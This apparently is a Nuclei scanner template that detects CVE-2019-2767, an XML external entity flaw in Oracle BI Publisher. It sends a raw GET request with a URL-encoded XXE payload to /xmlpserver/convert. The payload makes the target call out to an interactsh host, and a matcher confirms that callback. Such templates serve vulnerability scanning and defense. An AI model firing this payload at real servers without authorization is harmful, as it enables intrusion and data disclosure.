24 lines
1020 B
YAML
24 lines
1020 B
YAML
id: CVE-2019-2767
|
|
|
|
info:
|
|
name: Oracle Business Intelligence - Publisher XXE
|
|
author: madrobot
|
|
severity: high
|
|
description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher).
|
|
reference: |
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2767
|
|
- https://www.exploit-db.com/exploits/46729
|
|
tags: cve,cve2019,oracle,xxe,oob
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http"
|